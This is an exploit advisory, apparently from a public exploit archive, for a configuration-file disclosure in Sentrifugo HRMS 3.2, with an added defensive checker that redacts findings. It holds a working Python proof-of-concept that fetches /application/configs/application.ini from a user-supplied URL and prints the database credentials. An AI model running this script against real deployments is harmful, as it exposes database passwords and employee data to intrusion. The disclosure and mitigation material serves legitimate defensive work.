######################################################################
# Exploit Title : Sentrifugo Human Resource Management System 3.2 Database Configuration Disclosure
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 02/05/2019
# Vendor Homepage : sentrifugo.com
# Software Download Link : sentrifugo.com/downloadzip/1556734875
github.com/sapplica/sentrifugo/archive/master.zip
# Software Affected Versions : 1.1.1 - 1.1.7 - 2.0.1 Beta - 2.1.1 - 3.1.1 and 3.2
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Vulnerability Type :
CWE-16 [ Configuration ]
CWE-200 [ Information Exposure ]
CWE-538 [ File and Directory Information Exposure ]
# PacketStormSecurity : packetstormsecurity.com/files/authors/13968
# CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
# Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
######################################################################
# Information about Software :
***************************
Sentrifugo is a FREE and powerful Human Resource Management System
(HRMS) that can be easily configured to meet your organizational needs.
#####################################################################
# Impact :
***********
The Sentrifugo Human Resource Management System 3.2 configuration file may
disclose sensitive information to remote attackers.
The username and password of the database may be obtained through the "application.ini" file.
This has an impact on confidentiality, integrity, and availability.
The configuration file is stored, unintentionally web-accessible, at /application/configs/application.ini.
A single HTTP request for this file will cause the software to disclose sensitive
configuration information, including the database name and password used by the administrative web interface.
This file is installed, by default, with world-readable and possibly world-writeable permissions enabled.
This may have serious consequences because the configuration file
also stores the password in plain text.
This issue occurs because access controls on configuration files are not properly set.
An attacker can exploit this issue to retrieve potentially sensitive information.
Attackers can access the config file via a URL request. This may aid in further attacks.
Access to the /configs directory should be restricted with an adequate
countermeasure, for example a .htaccess file that denies all web access to it.
* The product stores sensitive information in files or directories that are accessible to actors
outside of the intended control sphere.
* An information exposure is the intentional or unintentional disclosure of information to an actor
that is not explicitly authorized to have access to that information.
Installation Guide for Windows - Linux - MacOSX => sentrifugo.com/installation-guide
#####################################################################
# Database Configuration File Disclosure Exploit :
*******************************************
/application/configs/application.ini
Information :
*************
resources.db.adapter = PDO_MYSQL
resources.db.params.host = SENTRIFUGO_HOST
resources.db.params.username = SENTRIFUGO_USERNAME
resources.db.params.password = SENTRIFUGO_PASSWORD
resources.db.params.dbname = SENTRIFUGO_DBNAME
resources.db.isDefaultTableAdapter = true
Exploit - Proof of Concept :
**************************
#!/usr/bin/env python3
# Ported from Python 2 (urllib2 / raw_input / print statement) so it runs on current
# interpreters; behaviour is unchanged: fetch application.ini and print its resources.* lines.
import re
import sys
from urllib.request import Request, urlopen

disc = "/application/configs/application.ini"
url = input("URL: ").rstrip("/")   # avoid a double slash when the URL ends with "/"
req = Request(url + disc)
rta = urlopen(req)
print("Result")
html = rta.read().decode("utf-8", "replace")
# Whole lines that define a resources.* setting. The original pattern "resources.*=*" also
# matched lines without any "=" because "=*" means zero or more equals signs.
rdo = re.findall(r"^resources\..*=.*$", html, re.M)
print("\n".join(rdo))
sys.exit(0)
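A defender-side check, added here and not part of the original advisory: it parses a constructed Zend-style application.ini (the format the file above uses, including "[child : parent]" section inheritance) and decides whether a probe response for /application/configs/application.ini discloses the database settings, reporting only redacted values so the report can be shared. The function names, the key list and the sample file are assumptions.

```python
import configparser

# Keys of the Zend-style application.ini whose exposure means database credential disclosure.
SENSITIVE_KEYS = ("resources.db.params.host", "resources.db.params.username",
                  "resources.db.params.password", "resources.db.params.dbname")

# Constructed sample of an application.ini as described in the advisory (not a real deployment).
SAMPLE_INI = """\
[production]
resources.db.adapter = PDO_MYSQL
resources.db.params.host = localhost
resources.db.params.username = sentrifugo
resources.db.params.password = example-secret-123
resources.db.params.dbname = sentrifugo
resources.db.isDefaultTableAdapter = true

[staging : production]
resources.db.params.dbname = sentrifugo_staging
"""

def parse_zend_ini(body):
    """Parse a Zend Framework INI body into {section: {key: value}}, flattening the
    '[child : parent]' inheritance so each section lists every effective setting."""
    cp = configparser.ConfigParser(interpolation=None, strict=False)
    cp.optionxform = str  # keep key names exactly as written
    cp.read_string(body)
    raw_name, parent_of = {}, {}
    for raw in cp.sections():
        name, _, parent = (p.strip() for p in raw.partition(":"))
        raw_name[name], parent_of[name] = raw, parent or None

    def flatten(name):
        data = flatten(parent_of[name]) if parent_of[name] in raw_name else {}
        data.update(cp[raw_name[name]])  # child keys override inherited ones
        return data
    return {name: flatten(name) for name in raw_name}

def assess_disclosure(status, body):
    """Return (disclosed, findings) for a response to GET .../application.ini. A non-200
    status or a non-INI body (e.g. an HTML error page) counts as not disclosed."""
    if status != 200:
        return False, {}
    try:
        cfg = parse_zend_ini(body)
    except configparser.Error:
        return False, {}
    findings = {f"{sec}/{key}": f"<redacted {len(kv[key])} chars>"
                for sec, kv in cfg.items() for key in SENSITIVE_KEYS if key in kv}
    return bool(findings), findings
```

After restricting the /configs directory with the .htaccess countermeasure, feed the probe's status and body to assess_disclosure; a 403 response must yield (False, {}).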
#####################################################################
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
#####################################################################